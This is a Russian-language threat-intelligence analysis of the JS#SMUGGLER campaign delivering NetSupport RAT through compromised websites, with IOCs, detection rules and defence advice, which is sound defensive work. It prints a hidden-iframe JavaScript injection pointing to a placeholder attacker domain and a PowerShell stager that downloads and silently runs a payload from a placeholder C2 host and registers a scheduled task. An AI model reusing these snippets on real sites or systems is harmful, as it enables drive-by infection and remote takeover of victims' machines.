Кампания JS#SMUGGLER: продвинутая многоэтапная атака использует взломанные сайты для распространения NetSupport RAT
Исследователи в области информационной безопасности выявили сложную кампанию по распространению вредоносного ПО под названием JS#SMUGGLER, которая использует взломанные легитимные сайты для распространения NetSupport RAT. Данная кампания применяет таргетинг на основе типа устройства, сильно обфусцированные JavaScript-загрузчики и безфайловое выполнение, чтобы обходить средства защиты и обеспечивать постоянный удалённый доступ к системам жертв.
Понимание угрозы JS#SMUGGLER
Киберпространство столкнулось с появлением исключительно продвинутой вредоносной кампании, демонстрирующей качественный скачок в методах веб-атак. Кампания, получившая обозначение JS#SMUGGLER по классификации исследователей Securonix, демонстрирует следующие ключевые характеристики:
- многоэтапную доставку полезной нагрузки,
- адаптацию к окружению жертвы,
- продвинутые механизмы антианализа,
- устойчивость к современным средствам защиты.
В отличие от классических атак через фишинг и вредоносные вложения, JS#SMUGGLER использует взломанные легитимные сайты как векторы распространения, что:
- значительно повышает вероятность заражения,
- использует доверие пользователей к известным ресурсам,
- сильно усложняет атрибуцию и блокировку инфраструктуры атакующих.
Кампания ориентирована преимущественно на корпоративных пользователей по всему миру, без жёсткой привязки к конкретным отраслям. Финальная полезная нагрузка — NetSupport RAT, предоставляющий атакующим:
- полный удалённый контроль,
- кражу учётных данных,
- манипуляции с файлами,
- эксфильтрацию данных.
Анатомия компрометации сайтов
Основа атаки — заражение легитимных сайтов, которые затем используются как точки распространения вредоносного кода.
| Преимущество атаки | Описание | Влияние на обнаружение |
|---|---|---|
| Эксплуатация доверенных доменов | Используются сайты с хорошей репутацией | Высокое — обход фильтров URL |
| Корректные SSL-сертификаты | Вредонос передаётся по HTTPS | Высокое — выглядит как безопасный трафик |
| Сложность атрибуции | Инфраструктура отделена от атакующих | Среднее |
| Постоянное распространение | Сайт работает легитимно и заражает | Высокое |
| Эксплуатация доверия пользователей | Вероятность клика выше | Высокое |
Методы взлома сайтов включают:
- уязвимости CMS,
- компрометацию админ-аккаунтов,
- атаки на плагины,
- SQL-инъекции.
Технический разбор многоэтапной цепочки заражения
Этап 1: Внедрение вредоносного JavaScript
При заходе на взломанный сайт пользователь незаметно получает скрытую загрузку через:
- iframe,
- JavaScript-редиректы.
Злоумышленники подгружают файл:
phone.js — с внешнего домена атакующих.
<script>
(function() {
var iframe = document.createElement('iframe');
iframe.style.display = 'none';
iframe.src = 'https://attacker-domain[.]com/phone.js';
document.body.appendChild(iframe);
})();
</script>
Этап 2: Профилирование устройства
JavaScript определяет тип устройства:
| Критерий | Мобильное устройство | Десктоп |
|---|---|---|
| User-Agent | Мобильная версия iframe | Вторичный payload |
| Разрешение экрана | Адаптация под мобильные экраны | Минимальный визуальный след |
| Поддержка touch | Включает сенсор | Отслеживает мышь/клавиатуру |
| Возможности платформы | Редирект | HTA + PowerShell |
Антианализ: вредонос запускается только при первом посещении.
Этап 3: Формирование HTA-загрузчика
HTA-файл запускается через mshta.exe:
| Компонент | Функция | Маскировка |
|---|---|---|
| mshta.exe | Исполнение HTA | Легитимный бинар |
| Окно | Скрывается | Пользователь ничего не видит |
| PowerShell | Записывается временно | Следы минимальны |
| Выполнение | В памяти | Обход сигнатур |
| Самоуничтожение | Удаляет файл | Уничтожение артефактов |
Этап 4: PowerShell-стейджер и загрузка NetSupport RAT
$url = "https://c2-domain[.]com/payload.bin"
$output = "$env:TEMP\service.exe"
Invoke-WebRequest -Uri $url -OutFile $output
Start-Process $output -WindowStyle Hidden
Register-ScheduledTask -TaskName "SystemService"
Методы закрепления:
- Autostart,
- Scheduled Tasks,
- Реестр.
NetSupport RAT — полный контроль над системой
| Категория | Возможности | Риски |
|---|---|---|
| Удалённый доступ | Полный контроль | Захват станции |
| Кража данных | Файлы, браузер, почта | Утечки |
| Слежка | Кейлоггер, камера, микрофон | Шпионаж |
| Сеть | Сканирование, прокси | Расширение атаки |
| Загрузка вредоноса | Ransomware, трояны | Массовые заражения |
⚠️ Критический риск: любая система с NetSupport RAT считается полностью скомпрометированной.
Атрибуция и Threat Intelligence
| Параметр | Значение |
|---|---|
| Актор | SmartApeSG |
| Альтернативные имена | HANEYMANEY, ZPHP |
| Первое появление | Конец 2024 |
| Методы | JavaScript-инъекции, RAT |
| Инфраструктура | boriver[.]com |
| Мотивация | Финансовая |
| Уровень | Высокий |
Связанная кампания CHAMELEON#NET
| Фактор | JS#SMUGGLER | CHAMELEON#NET |
|---|---|---|
| Вектор | Взломанные сайты | Фишинг |
| Начальный этап | phone.js | BZ2 архив |
| Промежуточный | HTA | VB.NET |
| Финал | NetSupport RAT | Formbook |
| Методы | Fileless | Reflective |
| Цели | Корпорации | Соцсектор |
IOC — индикаторы компрометации
| Тип | Значение | Контекст | Уверенность |
|---|---|---|---|
| Домен | boriver[.]com | Распространение | Высокая |
| Файл | phone.js | JS-загрузчик | Высокая |
| Процесс | mshta.exe | HTA | Средняя |
| Поведение | mshta → PowerShell | Цепочка атаки | Высокая |
| Планировщик | System Task | Закрепление | Средняя |
| Сеть | 5400/5405/443 | C2 | Высокая |
Detection & Hunting-правила (SIEM/EDR)
ParentImage ENDS_WITH "mshta.exe"
AND Image ENDS_WITH "powershell.exe"
CommandLine CONTAINS "windowstyle hidden"
EventID == 4698 AND TaskName CONTAINS "System"
NetworkConnection AND DestinationPort IN (5400, 5405, 443)
Защита сайтов от компрометации
- регулярные обновления CMS,
- MFA для админов,
- File Integrity Monitoring,
- Pentest и аудит,
- Subresource Integrity,
- WAF и CSP.
Реагирование на инциденты
| Фаза | Действия | Срок |
|---|---|---|
| Изоляция | Отключение, блокировка IOC | 30 мин |
| Масштаб | Определение всех заражённых | 2 ч |
| Форензика | Дампы, образы | 4 ч |
| Удаление | Чистка, патчи | 24 ч |
| Восстановление | Backup, reset | 48 ч |
| Post-mortem | Анализ, улучшения | 7 дней |
Стратегические рекомендации
- Zero Trust,
- Threat Intelligence,
- SOAR,
- User awareness,
- Proactive Vulnerability Management.
Эволюция веб-малвари
- уход от email к сайтам,
- device-aware вредонос,
- fileless-атаки,
- злоупотребление легитимными RAT,
- многоэтапные цепочки.
Вывод
Кампания JS#SMUGGLER демонстрирует новый уровень веб-атак, где:
- сайт становится оружием,
- легитимные инструменты — инструментом взлома,
- присутствие RAT означает полный захват.
Эта кампания — сигнал для бизнеса, что:
взлом сегодня начинается не с письма, а с браузера.